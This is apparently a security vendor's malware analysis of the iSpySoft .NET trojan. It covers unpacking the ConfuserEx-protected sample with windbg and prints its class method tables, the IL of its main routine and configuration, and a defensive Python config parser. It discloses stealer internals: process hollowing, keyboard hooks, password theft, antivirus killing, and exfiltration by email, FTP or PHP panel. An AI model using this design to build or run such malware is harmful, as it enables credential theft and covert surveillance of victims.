
iSpySoft Trojan Analysis

16-05-06

The iSpySoft trojan sample is written in .NET. Its original code has been protected with the ConfuserEx v0.6.0 obfuscator, which makes reverse engineering considerably harder.

Figure 1: Obfuscated code

We attempted to unpack the sample with windbg. The first step is to locate the executable module that is decrypted and loaded into memory; debugging shows that, once the program runs, a module named stub is loaded into memory:

0:000> !CLRStack
PDB symbol for mscorwks.dll not loaded
OS Thread Id: 0xa68 (0)
ESP       EIP
003ae488 773eb727 [HelperMethodFrame: 003ae488]
003ae52c 6e4b8496 System.IO.Path.CheckInvalidPathChars(System.String)
*** WARNING: Unable to verify checksum for C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
003ae538 6dd92736 System.IO.Path.NormalizePathFast(System.String, Boolean)
003ae5bc 6dd926c5 System.IO.Path.NormalizePath(System.String, Boolean)
003ae5cc 6dd92686 System.IO.Path.GetFullPathInternal(System.String)
003ae5d8 6dd39448 System.Reflection.Module.get_FullyQualifiedName()
003ae608 00626996 .        )(
003ae694 00626739 ..cctor()
003ae8a4 6e671b4c [GCFrame: 003ae8a4]
003aef8c 6e671b4c [GCFrame: 003aef8c]
003af170 6e671b4c [HelperMethodFrame_1OBJ: 003af170] System.RuntimeMethodHandle._InvokeMethodFast(System.Object, System.Object[], System.SignatureStruct ByRef, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
003af1e0 6dd85458 System.RuntimeMethodHandle.InvokeMethodFast(System.Object, System.Object[], System.Signature, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
003af230 6dd85206 System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo, Boolean)
003af26c 6dd850ee System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo)
003af28c 006266f7 .                     (System.Reflection.MethodInfo, System.String[], Boolean)
003af2a8 00624512 .                      (System.String[])
003af504 6e671b4c [GCFrame: 003af504]

@NSFOCUS 2016  http://www.nsfocus.com

 

Locating the stub module and inspecting its information shows that it is a complete PE file, so we dump the whole PE file:

0:000> !Name2EE *!stub
Module: 6db71000 (mscorlib.dll)
--------------------------------------
Module: 00262360 (sortkey.nlp)
--------------------------------------
Module: 00262010 (sorttbls.nlp)
--------------------------------------
Module: 002626b0 (prcp.nlp)
--------------------------------------
Module: 00262a00 (mscorlib.resources.dll)
--------------------------------------
Module: 001c2ff8 (GCL-05 DetailedPackingList.exe)
--------------------------------------
Module: 6c661000 (System.Windows.Forms.dll)
--------------------------------------
Module: 6d3d1000 (System.dll)
--------------------------------------
Module: 6d241000 (System.Drawing.dll)
--------------------------------------
Module: 001c71c0 (stub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
0:000> !DumpModule 001c71c0
Name: stub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
Attributes: PEFile
Assembly: 00494878
LoaderHeap: 00000000
TypeDefToMethodTableMap: 00a03de8
TypeRefToMethodTableMap: 00a03ef8
MethodDefToDescMap: 00a04090
FieldDefToDescMap: 00a04688
MemberRefToDescMap: 00a04b14
FileReferencesMap: 00a04e50
AssemblyReferencesMap: 00a04e54
MetaData start address: 005f53ec (97120 bytes)

Examining the code of stub.exe shows that it has already been decrypted and the program's code structure is clearly visible, although the code itself is still obfuscated. The extracted PE file can be run directly and behaves identically to the original sample:

Figure 2: Code structure after decryption

Next we extract the loaded resource UmbGctGTGGWnIGiBIgLVRjpHMdEi.dll. Inspecting this module shows that the program's functional code is mainly defined there, including anti memory dump, anti sandbox, command execution, file download, process injection, self-protection, screen monitoring, and loading of the configuration:

0:000> !CLRStack
OS Thread Id: 0xadc (0)
ESP       EIP
0032e7ac 6d9588b6 System.Convert.ChangeType(System.Object, System.Type, System.IFormatProvider)
0032e7c4 005d72a5 stub.exe!Unknown
0032e80c 005d60f9 stub.exe!Unknown
*** WARNING: Unable to verify checksum for image 01260000
*** ERROR: Module load completed but symbols could not be loaded for image 01260000
0032eac4 6db31b4c [GCFrame: 0032eac4]
0032f068 6db31b4c [PrestubMethodFrame: 0032f068] stub.exe!Unknown
0032f28c 6db31b4c [GCFrame: 0032f28c]
0:000> !Name2EE *!UmbGctGTGGWnIGiBIgLVRjpHMdEi
Module: 6d031000 (mscorlib.dll)
--------------------------------------
Module: 00192360 (sortkey.nlp)
--------------------------------------
Module: 00192010 (sorttbls.nlp)
--------------------------------------
Module: 001926b0 (prcp.nlp)
--------------------------------------
Module: 00192a00 (mscorlib.resources.dll)
--------------------------------------
Module: 00172ff8 (stub.exe)
--------------------------------------
Module: 001745a4 (UmbGctGTGGWnIGiBIgLVRjpHMdEi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
--------------------------------------
Module: 6c831000 (System.dll)
0:000> !DumpModule 001745a4
Name: UmbGctGTGGWnIGiBIgLVRjpHMdEi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
Attributes: PEFile
Assembly: 00686338
LoaderHeap: 00000000
TypeDefToMethodTableMap: 0022405c
TypeRefToMethodTableMap: 00224064
MethodDefToDescMap: 00224068
FieldDefToDescMap: 0022406c
MemberRefToDescMap: 00224070
FileReferencesMap: 00224078
AssemblyReferencesMap: 0022407c
MetaData start address: 00443238 (284 bytes)

 

Figure 3: Functional modules

Because stub.exe is still obfuscated, we debug stub.exe directly in windbg to deobfuscate it. By inspecting the program's call stack at run time we can confirm whether the code has finished being restored:

ESP       EIP
0036ea5c 77e6f8c1 [NDirectMethodFrameStandalone: 0036ea5c] System.Net.UnsafeNclNativeMethods+OSSOCK.WSAConnect(IntPtr, Byte[], Int32, IntPtr, IntPtr, IntPtr, IntPtr)
0036ea80 6c97228a System.Net.Sockets.Socket.DoConnect(System.Net.EndPoint, System.Net.SocketAddress)
*** WARNING: Unable to verify checksum for C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
0036eaa0 6c959144 System.Net.Sockets.Socket.InternalConnect(System.Net.EndPoint)
0036eab0 6c9515f1 System.Net.ServicePoint.ConnectSocketInternal(Boolean, System.Net.Sockets.Socket, System.Net.Sockets.Socket, System.Net.Sockets.Socket ByRef, System.Net.IPAddress ByRef, ConnectSocketState, System.IAsyncResult, Int32, System.Exception ByRef)
0036eb14 6c9514f9 System.Net.ServicePoint.ConnectSocket(System.Net.Sockets.Socket, System.Net.Sockets.Socket, System.Net.Sockets.Socket ByRef, System.Net.IPAddress ByRef, ConnectSocketState, Int32, System.Exception ByRef)
0036eb3c 6c95147c System.Net.ServicePoint.GetConnection(System.Net.PooledStream, System.Object, Boolean, System.Net.IPAddress ByRef, System.Net.Sockets.Socket ByRef, System.Net.Sockets.Socket ByRef, Int32)
0036eb7c 6c95135c System.Net.PooledStream.Activate(System.Object, Boolean, Int32, System.Net.GeneralAsyncDelegate)
0036ebb8 6c95116a System.Net.Connection.CompleteStartConnection(Boolean, System.Net.HttpWebRequest)
0036ec00 6c97978a System.Net.Connection.CompleteStartRequest(Boolean, System.Net.HttpWebRequest, System.Net.TriState)
0036ec30 6c9790d3 System.Net.Connection.SubmitRequest(System.Net.HttpWebRequest)
0036ec74 6c978a2c System.Net.ServicePoint.SubmitRequest(System.Net.HttpWebRequest, System.String)
0036ecac 6c9782f9 System.Net.HttpWebRequest.SubmitRequest(System.Net.ServicePoint)
0036ecd8 6ce9de54 System.Net.HttpWebRequest.GetResponse()
0036ed18 6cce6db0 System.Net.WebClient.GetWebResponse(System.Net.WebRequest)
0036ed24 6cce87cb System.Net.WebClient.DownloadBits(System.Net.WebRequest, System.IO.Stream, System.Net.CompletionDelegate, System.ComponentModel.AsyncOperation)
0036ed48 6cce6b53 System.Net.WebClient.DownloadDataInternal(System.Uri, System.Net.WebRequest ByRef)
0036ed78 6cce7e43 System.Net.WebClient.DownloadString(System.Uri)
0036edac 6cce7dc6 System.Net.WebClient.DownloadString(System.String)
0036edb8 00622a19 Technitium.ComputerInformation.GetExternalIP()
0036ee04 00621b1b Technitium.ComputerInformation.GetInformation()
0036ef1c 00620ca6 Technitium.Core.FileExecuted()
0036f124 0062057c Technitium.Main.main()
0036f3c8 6db31b4c [GCFrame: 0036f3c8]

 

Figure 4: Obtaining the external IP address

After the unpacking and deobfuscation described above, we extract the sample's original core code for analysis. The code contains the following core classes: Technitium.Main, Technitium.Core, Technitium.RunPEx, Technitium.Config, Technitium.Stealer, and others. Their details are listed below:

# Technitium.Config
1:006> !dumpmt -md 00183c64
EEClass: 00371b0c
Module: 00182ff8
Name: Technitium.Config
mdToken: 0200003a (C:\Users\bassx\Desktop\stub.exe)
BaseSize: 0xc
ComponentSize: 0x0
Number of IFaces in IFaceMap: 0
Slots in VTable: 7
--------------------------------------
MethodDesc Table
Entry    MethodDesc JIT    Name
6d1f6a90 6d07494c PreJIT System.Object.ToString()
6d1f6ab0 6d074954 PreJIT System.Object.Equals(System.Object)
6d1f6b20 6d074984 PreJIT System.Object.GetHashCode()
6d267540 6d0749a8 PreJIT System.Object.Finalize()
00620108 00183c48 JIT    Technitium.Config..cctor()
0018c10d 00183c50 NONE   Technitium.Config..ctor()
0018c111 00183c58 NONE   Technitium.Config.DumpErrorLog(System.Exception, System.String)

# Technitium.Stealer
1:006> !dumpmt -md 00188760
EEClass: 003764e8
Module: 00182ff8
Name: Technitium.Stealer
mdToken: 02000022 (C:\Users\bassx\Desktop\stub.exe)
BaseSize: 0xc
ComponentSize: 0x0
Number of IFaces in IFaceMap: 0
Slots in VTable: 13
--------------------------------------
MethodDesc Table
Entry    MethodDesc JIT    Name
6d1f6a90 6d07494c PreJIT System.Object.ToString()
6d1f6ab0 6d074954 PreJIT System.Object.Equals(System.Object)
6d1f6b20 6d074984 PreJIT System.Object.GetHashCode()
6d267540 6d0749a8 PreJIT System.Object.Finalize()
0018c4b5 001886f8 NONE   Technitium.Stealer..ctor()
00623918 00188700 JIT    Technitium.Stealer.Recover()
0018c4bd 0018870c NONE   Technitium.Stealer.MSParseLogs(System.String)
0018c4c1 00188718 NONE   Technitium.Stealer.OSParseLogs(System.String)
0018c4c5 00188724 NONE   Technitium.Stealer.MLParseLogs(System.String)
0018c4c9 00188730 NONE   Technitium.Stealer.WBParseLogs(System.String)
0018c4cd 0018873c NONE   Technitium.Stealer.WaitUntilFileIsAvailable(System.String)
00624080 00188748 JIT    Technitium.Stealer.Decompress(Byte[])
00623fd0 00188754 JIT    Technitium.Stealer.Cloud(System.String)

# Technitium.RunPEx
1:006> !dumpmt -md 00188c2c
EEClass: 0037688c
Module: 00182ff8
Name: Technitium.RunPEx
mdToken: 02000040 (C:\Users\bassx\Desktop\stub.exe)
BaseSize: 0xc
ComponentSize: 0x0
Number of IFaces in IFaceMap: 0
Slots in VTable: 15
--------------------------------------
MethodDesc Table
Entry    MethodDesc JIT    Name
6d1f6a90 6d07494c PreJIT System.Object.ToString()
6d1f6ab0 6d074954 PreJIT System.Object.Equals(System.Object)
6d1f6b20 6d074984 PreJIT System.Object.GetHashCode()
6d267540 6d0749a8 PreJIT System.Object.Finalize()
0018c60d 00188aac NONE   Technitium.RunPEx..ctor()
0018c64c 00188ab4 NONE   Technitium.RunPEx.CreateProcess(System.String, System.String, IntPtr, IntPtr, Boolean, UInt32, IntPtr, System.String, STARTUP_INFORMATION ByRef, PROCESS_INFORMATION ByRef)
0018c658 00188ad8 NONE   Technitium.RunPEx.GetThreadContext(IntPtr, Int32[])
0018c694 00188afc NONE   Technitium.RunPEx.SetThreadContext(IntPtr, Int32[])
0018c664 00188b20 NONE   Technitium.RunPEx.ReadProcessMemory(IntPtr, Int32, Int32 ByRef, Int32, Int32 ByRef)
0018c688 00188b44 NONE   Technitium.RunPEx.WriteProcessMemory(IntPtr, Int32, Byte[], Int32, Int32 ByRef)
0018c670 00188b68 NONE   Technitium.RunPEx.NtUnmapViewOfSection(IntPtr, Int32)
0018c67c 00188b8c NONE   Technitium.RunPEx.VirtualAllocEx(IntPtr, Int32, Int32, Int32, Int32)
0018c6a0 00188bb0 NONE   Technitium.RunPEx.ResumeThread(IntPtr)
006241d0 00188bd4 JIT    Technitium.RunPEx.Run(System.String, System.String, Byte[], Boolean, Boolean)
00624270 00188be0 JIT    Technitium.RunPEx.HandleRun(System.String, System.String, Byte[], Boolean, Boolean)

# Technitium.Main
1:006> !dumpmt -md 001838dc
EEClass: 003715cc
Module: 00182ff8
Name: Technitium.Main
mdToken: 02000002 (C:\Users\bassx\Desktop\stub.exe)
BaseSize: 0xc
ComponentSize: 0x0
Number of IFaces in IFaceMap: 0
Slots in VTable: 25
--------------------------------------
MethodDesc Table
Entry    MethodDesc JIT    Name
6d1f6a90 6d07494c PreJIT System.Object.ToString()
6d1f6ab0 6d074954 PreJIT System.Object.Equals(System.Object)
6d1f6b20 6d074984 PreJIT System.Object.GetHashCode()
6d267540 6d0749a8 PreJIT System.Object.Finalize()
00620070 001836e4 JIT    Technitium.Main..cctor()
00620440 001836ec JIT    Technitium.Main.main()
0018c079 001836f8 NONE   Technitium.Main.ProProtect()
0018c07d 00183704 NONE   Technitium.Main.Disablers()
0018c081 00183710 NONE   Technitium.Main.AV()
0018c085 0018371c NONE   Technitium.Main.Bot()
0018c089 00183728 NONE   Technitium.Main.ProcessP()
0018c08d 00183734 NONE   Technitium.Main.SendLogs()
0018c091 00183740 NONE   Technitium.Main.UnhookWindowsHookEx(Int32)
0018c095 00183764 NONE   Technitium.Main.SetWindowsHookEx(Int32, KeyboardHookDelegate, Int32, Int32)
0018c099 00183788 NONE   Technitium.Main.GetAsyncKeyState(Int32)
0018c09d 001837ac NONE   Technitium.Main.CallNextHookEx(Int32, Int32, Int32, KBDLLHOOKSTRUCT)
0018c0a1 001837d0 NONE   Technitium.Main.lineSetAppSpecific(Int64, Int64)
0018c0a5 001837f4 NONE   Technitium.Main.MgmGetNextMfeStats(IntPtr ByRef, Int64 ByRef, System.String ByRef, Int64 ByRef)
0018c0a9 00183818 NONE   Technitium.Main.GetForegroundWindow()
0018c0ad 0018383c NONE   Technitium.Main.GetWindowText(Int32, System.String ByRef, Int32)
0018c0b1 00183860 NONE   Technitium.Main.GetActiveWindowTitle()
0018c0b5 0018386c NONE   Technitium.Main.Hooked()
0018c0b9 00183878 NONE   Technitium.Main.HookKeyboard()
0018c0bd 00183884 NONE   Technitium.Main.UnhookKeyboard()
0018c0c1 00183890 NONE   Technitium.Main.KeyboardCallback(Int32, Int32, KBDLLHOOKSTRUCT ByRef)

# Technitium.Core
1:006> !dumpmt -md 001849e0
EEClass: 00371d0c
Module: 00182ff8
Name: Technitium.Core
mdToken: 0200003b (C:\Users\bassx\Desktop\stub.exe)
BaseSize: 0xc
ComponentSize: 0x0
Number of IFaces in IFaceMap: 0
Slots in VTable: 23
--------------------------------------
MethodDesc Table
Entry    MethodDesc JIT    Name
6d1f6a90 6d07494c PreJIT System.Object.ToString()
6d1f6ab0 6d074954 PreJIT System.Object.Equals(System.Object)
6d1f6b20 6d074984 PreJIT System.Object.GetHashCode()
6d267540 6d0749a8 PreJIT System.Object.Finalize()
0018c141 001848b0 NONE   Technitium.Core..ctor()
0018c145 001848b8 NONE   Technitium.Core.CreateAPI(System.String, System.String)
0018c149 001848cc NONE   Technitium.Core.CallAPI(System.String, System.String, System.Type[], System.Object[])
0018c14d 001848e0 NONE   Technitium.Core.GetInstallPath()
0018c151 001848ec NONE   Technitium.Core.IsAdmin()
0018c155 001848f8 NONE   Technitium.Core.RecoverPasswords()
00620740 00184904 JIT    Technitium.Core.Decrypt()
0018c15d 00184910 NONE   Technitium.Core.DeleteSavedPasswords()
0018c161 0018491c NONE   Technitium.Core.UploadScreenshot()
0018c165 00184928 NONE   Technitium.Core.GenerateHWID()
0018c169 00184934 NONE   Technitium.Core.MD5(System.String)
0018c16d 00184940 NONE   Technitium.Core.GetVolumeInformationA(System.String ByRef, System.String ByRef, UInt32, UInt32 ByRef, UInt32 ByRef, UInt32 ByRef, System.String ByRef, UInt32)
0018c171 00184964 NONE   Technitium.Core.HidD_GetHidGuid(System.Guid ByRef)
00620bd8 00184988 JIT    Technitium.Core.FileExecuted()
0018c179 00184994 NONE   Technitium.Core.Install()
0018c17d 001849a0 NONE   Technitium.Core.IsConnectedToInternet()
0018c181 001849ac NONE   Technitium.Core.Startup(System.Object)
0018c185 001849b8 NONE   Technitium.Core.FakeMessage()
0018c189 001849c4 NONE   Technitium.Core.Upload(System.String, System.String, System.String)

 

0x01 Functional analysis

The iSpySoft trojan implements a wide range of functions, including theft of user information and browser data (saved login user names and passwords), keystroke logging, screenshots, webcam capture, file download, file upload, and remote control.

Figure 5: Main module functions

Below is an analysis of its main function. What the main function does depends on the configuration: each configured option causes the corresponding function to be executed:

# Technitium.Main.main() main function
1:006> !dumpil 001836ec
ilAddr = 004020a4
IL_0000: nop
.try
{
IL_0001: nop
IL_0002: ldsfld Technitium.Config::DELAY_EXECUTION    # read configuration parameter
IL_0007: call System.Convert::ToInt32
IL_000c: ldc.i4 1000
IL_0011: mul.ovf
IL_0012: call System.Threading.Thread::Sleep
IL_0017: nop
IL_0018: ldsfld Technitium.Config::ANTI_windowS    # read configuration parameter
IL_001d: call System.String::IsNullOrEmpty
IL_0022: ldc.i4.0
IL_0023: ceq
IL_0025: stloc.1
IL_0026: ldloc.1
IL_0027: brfalse.s IL_0030
IL_0029: newobj Antiwindow::.ctor
IL_002e: stloc.2
IL_002f: nop
IL_0030: nop
IL_0031: ldc.i4.0
IL_0032: stloc.0
IL_0033: nop
IL_0034: ldc.i4.1
IL_0035: ldsfld Technitium.Config::MUTEX
IL_003a: ldloca.s VAR OR ARG 0
IL_003c: newobj System.Threading.Mutex::.ctor
IL_0041: stloc.3
.try
{
IL_0042: ldloc.0
IL_0043: stloc.s VAR OR ARG 4
IL_0045: ldloc.s VAR OR ARG 4
IL_0047: brfalse IL_010e
IL_004c: call Technitium.Core::Decrypt
IL_0051: nop
IL_0052: ldsfld Technitium.Config::INSTALL_FILE    # read configuration parameter
IL_0057: call System.String::IsNullOrEmpty
IL_005c: ldc.i4.0
IL_005d: ceq
IL_005f: stloc.s VAR OR ARG 5
IL_0061: ldloc.s VAR OR ARG 5
IL_0063: brfalse.s IL_006c
IL_0065: call Technitium.Core::Install
IL_006a: nop
IL_006b: nop
IL_006c: nop
IL_006d: call Technitium.Core::FileExecuted
IL_0072: nop
IL_0073: ldsfld Technitium.Config::KEYSTROKES    # read configuration parameter
IL_0078: call System.String::IsNullOrEmpty
IL_007d: ldc.i4.0
IL_007e: ceq
IL_0080: stloc.s VAR OR ARG 6
IL_0082: ldloc.s VAR OR ARG 6
IL_0084: brfalse.s IL_00cb
IL_0086: ldstr "..[--- Window: "
IL_008b: stsfld Technitium.Main::LHeader
IL_0090: ldstr " ---].."
IL_0095: stsfld Technitium.Main::RHeader
IL_009a: call Technitium.Main::HookKeyboard
IL_009f: nop
IL_00a0: ldc.i4.1
IL_00a1: stsfld Technitium.Main::UseCaps
IL_00a6: ldnull
IL_00a7: ldftn Technitium.Main::SendLogs
IL_00ad: newobj System.Threading.ThreadStart::.ctor
IL_00b2: newobj System.Threading.Thread::.ctor
IL_00b7: stloc.s VAR OR ARG 7
IL_00b9: ldloc.s VAR OR ARG 7
IL_00bb: ldc.i4.0
IL_00bc: callvirt System.Threading.Thread::SetApartmentState
IL_00c1: nop
IL_00c2: ldloc.s VAR OR ARG 7
IL_00c4: callvirt System.Threading.Thread::Start
IL_00c9: nop
IL_00ca: nop
IL_00cb: nop
IL_00cc: call Technitium.Main::Disablers
IL_00d1: nop
IL_00d2: call Technitium.Main::AV
IL_00d7: nop
IL_00d8: call Technitium.Main::Bot
IL_00dd: nop
IL_00de: call Technitium.Main::ProProtect
IL_00e3: nop
IL_00e4: ldsfld Technitium.Config::RUNESCAPE_PINLOGGER    # read configuration parameter
IL_00e9: call System.String::IsNullOrEmpty
IL_00ee: ldc.i4.0
IL_00ef: ceq
IL_00f1: stloc.s VAR OR ARG 8
IL_00f3: ldloc.s VAR OR ARG 8
IL_00f5: brfalse.s IL_010a
IL_00f7: ldnull
IL_00f8: ldftn Technitium.Pinlogger::Log
IL_00fe: newobj System.Threading.WaitCallback::.ctor
IL_0103: call System.Threading.ThreadPool::QueueUserWorkItem
IL_0108: pop
IL_0109: nop
IL_010a: nop
IL_010b: nop
IL_010c: br.s IL_0117
IL_010e: nop
IL_010f: ldc.i4.0
IL_0110: call System.Environment::Exit
IL_0115: nop
IL_0116: nop
IL_0117: leave.s IL_0125
} // end .try
.finally
{
IL_0119: nop
IL_011a: ldloc.3
IL_011b: brfalse.s IL_0124
IL_011d: ldloc.3
IL_011e: callvirt System.IDisposable::Dispose
IL_0123: nop
IL_0124: endfinally
} // end .finally
IL_0125: call System.Diagnostics.Process::GetCurrentProcess
IL_012a: callvirt System.Diagnostics.Process::WaitForExit
IL_012f: nop
IL_0130: leave.s IL_0151
} // end .try
.catch
{
IL_0132: dup
IL_0133: call Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError
IL_0138: stloc.s VAR OR ARG 9
IL_013a: nop
IL_013b: ldloc.s VAR OR ARG 9
IL_013d: callvirt System.Exception::ToString
IL_0142: ldc.i4.0
IL_0143: ldnull
IL_0144: call Microsoft.VisualBasic.Interaction::MsgBox
IL_0149: pop
IL_014a: call Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError
IL_014f: leave.s IL_0151
} // end .catch
IL_0151: nop
IL_0152: ret

 

Main configuration of the iSpySoft trojan:

# Technitium.Config..cctor() configuration
1:006> !dumpil 00183c48
ilAddr = 00407b3c
IL_0000: ldstr "1.0.0.0"
IL_0005: stsfld Technitium.Config::VERSION    # version
IL_000a: ldstr "AF7B1841C6A70C858E3201422E2D0BEA"
IL_000f: stsfld Technitium.Config::HWID    # HWID
IL_0014: ldstr "149ff47a-7df2-4b42-823e-2820d63034b4"
IL_0019: stsfld Technitium.Config::MUTEX    # iSpy mutex
IL_001e: ldstr "EMAIL"
IL_0023: stsfld Technitium.Config::UPLOAD_METHOD    # upload method; three are supported: EMAIL, FTP, PHP
IL_0028: ldstr "XXXXXXXXXXXXXXX"
IL_002d: stsfld Technitium.Config::EMAIL_USERNAME    # email user name
IL_0032: ldstr "XXXXXXXXXXXXXXX"
IL_0037: stsfld Technitium.Config::EMAIL_PASSWORD    # email password
IL_003c: ldstr "XXXXXXXXXXXXXXX"
IL_0041: stsfld Technitium.Config::EMAIL_PORT    # email port
IL_0046: ldstr "XXXXXXXXXXXXXXX"
IL_004b: stsfld Technitium.Config::EMAIL_SERVER    # email server
IL_0050: ldstr ""
IL_0055: stsfld Technitium.Config::EMAIL_SSL    # whether SSL is enabled
IL_005a: ldstr "XXXXXXXXXXXXXXX"
IL_005f: stsfld Technitium.Config::FTP_USERNAME    # FTP user name
IL_0064: ldstr "XXXXXXXXXXXXXXX"
IL_0069: stsfld Technitium.Config::FTP_PASSWORD    # FTP password
IL_006e: ldstr "XXXXXXXXXXXXXXX"
IL_0073: stsfld Technitium.Config::FTP_SERVER    # FTP server
IL_0078: ldstr "XXXXXXXXXXXXXXX"
IL_007d: stsfld Technitium.Config::PHP_KEY    # PHP key
IL_0082: ldstr "XXXXXXXXXXXXXXX"
IL_0087: stsfld Technitium.Config::WEBPANEL    # PHP panel
IL_008c: ldstr "10"
IL_0091: stsfld Technitium.Config::LOG_INTERVAL
IL_0096: ldstr ""
IL_009b: stsfld Technitium.Config::CLIPBOARD_MONITORING    # clipboard monitoring
IL_00a0: ldstr ""
IL_00a5: stsfld Technitium.Config::SEND_SCREENSHOTS    # send screenshots
IL_00aa: ldstr ""
IL_00af: stsfld Technitium.Config::KEYSTROKES    # keystroke logging
IL_00b4: ldstr ""
IL_00b9: stsfld Technitium.Config::WEBCAM_LOGGER    # webcam monitoring
IL_00be: ldstr ""
IL_00c3: stsfld Technitium.Config::MODIFY_TASK_MANAGER    # disable Task Manager
IL_00c8: ldstr ""
IL_00cd: stsfld Technitium.Config::ANTI_windowS    # debugger detection
IL_00d2: ldstr ""
IL_00d7: stsfld Technitium.Config::PROCESS_PROTECTION    # process self-protection
IL_00dc: ldstr ""
IL_00e1: stsfld Technitium.Config::RUNESCAPE_PINLOGGER
IL_00e6: ldstr ""
IL_00eb: stsfld Technitium.Config::CLEAR_SAVED
IL_00f0: ldstr "2a76d583-f7dc-4bb6-88eb-6515438f2ee7"
IL_00f5: stsfld Technitium.Config::PASSWORD_STEALER    # password stealing
IL_00fa: ldstr ""
IL_00ff: stsfld Technitium.Config::MELT_FILE
IL_0104: ldstr ""
IL_0109: stsfld Technitium.Config::INSTALL_FILE    # install file
IL_010e: ldstr "[PATHTYPE]"
IL_0113: stsfld Technitium.Config::PATH_TYPE    # install path
IL_0118: ldstr "[FOLDER]"
IL_011d: stsfld Technitium.Config::FOLDER_NAME    # install folder name
IL_0122: ldstr "[FILENAME]"
IL_0127: stsfld Technitium.Config::FILE_NAME    # install file name
IL_012c: ldstr ""
IL_0131: stsfld Technitium.Config::HKCU    # registry setting 1
IL_0136: ldstr ""
IL_013b: stsfld Technitium.Config::HKLM    # registry setting 2
IL_0140: ldstr ""
IL_0145: stsfld Technitium.Config::BINDER    # bind port
IL_014a: ldstr ""
IL_014f: stsfld Technitium.Config::VISIT_WEBSITE    # visit website
IL_0154: ldstr ""
IL_0159: stsfld Technitium.Config::BLOCKER_WEBSITE    # block website
IL_015e: ldstr ""
IL_0163: stsfld Technitium.Config::REGISTRY_PERSISTENCE
IL_0168: ldstr ""
IL_016d: stsfld Technitium.Config::HIDE_FILE    # hide file
IL_0172: ldstr ""
IL_0177: stsfld Technitium.Config::DOWNLOAD_FILE    # download file
IL_017c: ldstr ""
IL_0181: stsfld Technitium.Config::DOWNLOAD_FILE_TYPE    # download file type
IL_0186: ldstr ""
IL_018b: stsfld Technitium.Config::MESSAGE_TYPE    # message type definition
IL_0190: ldstr "[MTITLE]"
IL_0195: stsfld Technitium.Config::MESSAGE_TITLE    # message title definition
IL_019a: ldstr "[MBODY]"
IL_019f: stsfld Technitium.Config::MESSAGE_BODY    # message body definition
IL_01a4: ldstr ""
IL_01a9: stsfld Technitium.Config::DISABLERS    # disable system functions (cmd)
IL_01ae: ldstr ""
IL_01b3: stsfld Technitium.Config::BOT_KILLER    # kill bots
IL_01b8: ldstr ""
IL_01bd: stsfld Technitium.Config::ANTIVIRUS_KILLER    # kill antivirus software
IL_01c2: ldstr "0"
IL_01c7: stsfld Technitium.Config::DELAY_EXECUTION    # delayed execution
IL_01cc: ret
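As an added example (not from the original analysis), the following Python script parses a `!dumpil` excerpt of Technitium.Config..cctor() in the format shown above, pairing each ldstr literal with the stsfld that follows it to recover the configuration, and then models the branches Technitium.Main.main() takes on that configuration (a feature runs only when its string is non-empty; DELAY_EXECUTION is converted to an integer and multiplied by 1000). The embedded IL excerpt is a constructed, shortened copy of the dump, and the function names are mine.

```python
import re
from typing import Dict

# Constructed, shortened excerpt of the !dumpil output for
# Technitium.Config..cctor() (same line format as the dump above).
IL_DUMP = """
IL_001e: ldstr "EMAIL"
IL_0023: stsfld Technitium.Config::UPLOAD_METHOD    # upload method
IL_0028: ldstr "XXXXXXXXXXXXXXX"
IL_002d: stsfld Technitium.Config::EMAIL_USERNAME
IL_0050: ldstr ""
IL_0055: stsfld Technitium.Config::EMAIL_SSL
IL_00aa: ldstr ""
IL_00af: stsfld Technitium.Config::KEYSTROKES
IL_00c8: ldstr ""
IL_00cd: stsfld Technitium.Config::ANTI_windowS
IL_00f0: ldstr "2a76d583-f7dc-4bb6-88eb-6515438f2ee7"
IL_00f5: stsfld Technitium.Config::PASSWORD_STEALER
IL_0104: ldstr ""
IL_0109: stsfld Technitium.Config::INSTALL_FILE
IL_01c2: ldstr "0"
IL_01c7: stsfld Technitium.Config::DELAY_EXECUTION
IL_01cc: ret
"""

# ldstr pushes a string literal; stsfld stores the stack top into a static field.
# A trailing "# ..." analyst comment is tolerated on either line.
LDSTR = re.compile(r'^IL_[0-9a-f]{4}:\s+ldstr\s+"(.*?)"\s*(#.*)?$')
STSFLD = re.compile(r'^IL_[0-9a-f]{4}:\s+stsfld\s+Technitium\.Config::(\w+)')

REDACTED = "XXXXXXXXXXXXXXX"  # the write-up masks credentials with this value


def extract_config(il_text: str) -> Dict[str, str]:
    """Recover the static config fields from the .cctor IL.

    The constructor is a straight sequence of ldstr/stsfld pairs, so the
    most recent ldstr literal is the value stored by the next stsfld.
    """
    config: Dict[str, str] = {}
    pending = None
    for line in il_text.splitlines():
        line = line.strip()
        m = LDSTR.match(line)
        if m:
            pending = m.group(1)
            continue
        m = STSFLD.match(line)
        if m and pending is not None:
            config[m.group(1)] = pending
            pending = None
    return config


def main_behaviour(config: Dict[str, str]) -> Dict[str, object]:
    """Model the decisions Technitium.Main.main() makes from the config:
    DELAY_EXECUTION becomes Thread.Sleep(int * 1000) ms, and every other
    feature is gated on String.IsNullOrEmpty of its field."""
    delay = config.get("DELAY_EXECUTION", "")
    return {
        "sleep_ms": int(delay) * 1000 if delay.isdigit() else 0,
        "anti_debug": bool(config.get("ANTI_windowS")),
        "install": bool(config.get("INSTALL_FILE")),
        "keylogger": bool(config.get("KEYSTROKES")),
        "pinlogger": bool(config.get("RUNESCAPE_PINLOGGER")),
        "password_stealer": bool(config.get("PASSWORD_STEALER")),
        "upload_method": config.get("UPLOAD_METHOD", ""),
        "redacted_fields": sorted(k for k, v in config.items() if v == REDACTED),
    }
```

Run against the full dump above, the same routine lists every enabled feature and the exfiltration channel in one pass, which is the triage question the configuration answers.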

 

Figure 6: Password stealing

